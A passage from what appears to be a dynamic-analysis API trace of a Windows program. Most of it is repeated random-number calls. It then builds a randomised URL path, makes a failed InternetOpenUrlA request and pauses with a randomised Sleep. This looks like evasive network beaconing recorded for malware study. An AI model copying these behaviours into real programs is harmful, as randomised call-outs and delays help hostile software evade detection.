cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.959] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.959] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.959] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.959] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.959] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.959] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.960] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.960] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.960] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.960] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.960] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.960] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.960] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.960] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.961] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.961] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.961] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.149] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0244.150] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.150] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02396, cbBuffer=0x1b, dwFlags=0x2 | out: pbBuffer=0x3a02396) returned 0x0 [0244.150] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.150] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0244.150] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.150] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0244.150] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.151] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0244.151] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.151] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.151] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.151] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.151] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.152] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.152] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.152] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.152] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.152] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.152] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.152] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.152] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.153] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.153] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.153] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0244.153] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.153] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.153] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.153] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0244.154] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.154] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.154] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.154] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.154] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.154] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.155] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.155] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.155] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.155] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0244.155] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.155] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.156] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.156] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.156] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.156] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.156] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.157] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.157] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.157] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0244.157] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.158] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a023b1, cbBuffer=0x15, dwFlags=0x2 | out: pbBuffer=0x3a023b1) returned 0x0 [0244.158] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.159] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.159] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.159] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.159] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.159] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.160] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.160] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.160] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.160] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.160] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.160] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.160] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.160] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.161] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.161] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.162] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.162] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.162] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.162] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0244.162] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.162] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.162] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.163] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0244.163] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.163] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.163] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.163] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0244.163] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.163] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0244.164] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.164] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a023c6, cbBuffer=0x19, dwFlags=0x2 | out: pbBuffer=0x3a023c6) returned 0x0 [0244.164] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.164] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.164] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.164] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.164] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.165] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.165] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.165] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0244.165] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.165] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.165] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.165] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0244.166] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.166] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.166] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.166] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0244.166] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.166] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.166] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.167] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.167] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.167] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.167] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.167] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.168] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.168] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.168] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.168] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.168] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.168] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.168] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.168] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0244.169] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.169] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0244.169] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.169] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0244.169] GetProcessHeap () returned 0x440000 [0244.169] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472b10 [0244.169] lstrcpyA (in: lpString1=0x472b10, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0244.169] lstrcatA (in: lpString1="\x81\x03", lpString2="/rwc5tspn4kkDkCj5juikqoAxbqZ3hPfVQ9t/mvYuhw4ztsD15uw2ynrmSWgbfam8Z71y/3C3xnlmvCfw9tj7oolb7ukfCs0/veypqugoruBj1sKS5u4X/0kkihv1Dd4l7poapwzfF94z0/" | out: lpString1="\x81\x03/rwc5tspn4kkDkCj5juikqoAxbqZ3hPfVQ9t/mvYuhw4ztsD15uw2ynrmSWgbfam8Z71y/3C3xnlmvCfw9tj7oolb7ukfCs0/veypqugoruBj1sKS5u4X/0kkihv1Dd4l7poapwzfF94z0/") returned="\x81\x03/rwc5tspn4kkDkCj5juikqoAxbqZ3hPfVQ9t/mvYuhw4ztsD15uw2ynrmSWgbfam8Z71y/3C3xnlmvCfw9tj7oolb7ukfCs0/veypqugoruBj1sKS5u4X/0kkihv1Dd4l7poapwzfF94z0/" [0244.170] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0244.170] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/rwc5tspn4kkDkCj5juikqoAxbqZ3hPfVQ9t/mvYuhw4ztsD15uw2ynrmSWgbfam8Z71y/3C3xnlmvCfw9tj7oolb7ukfCs0/veypqugoruBj1sKS5u4X/0kkihv1Dd4l7poapwzfF94z0/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0244.170] GetProcessHeap () returned 0x440000 [0244.170] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472b10 | out: hHeap=0x440000) returned 1 [0244.170] GetProcessHeap () returned 0x440000 [0244.170] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a02350 | out: hHeap=0x440000) returned 1 [0244.170] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0244.170] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0244.170] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.171] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0244.171] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0244.171] Sleep (dwMilliseconds=0x163f5) [0244.330] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.330] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0244.330] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.330] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0244.330] GetProcessHeap () returned 0x440000 [0244.330] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f5870 [0244.331] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.331] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0244.331] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.331] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f5871, cbBuffer=0x14, dwFlags=0x2 | out: pbBuffer=0x4f5871) returned 0x0 [0244.331] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.331] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.331] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.331] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.331] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.331] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.331] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.331] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.332] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.332] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.332] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.332] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.332] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.332] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.332] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.332] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.332] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.333] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0244.333] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.333] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0244.333] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.333] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0244.333] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.333] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.333] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.333] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0244.333] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0244.333] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, 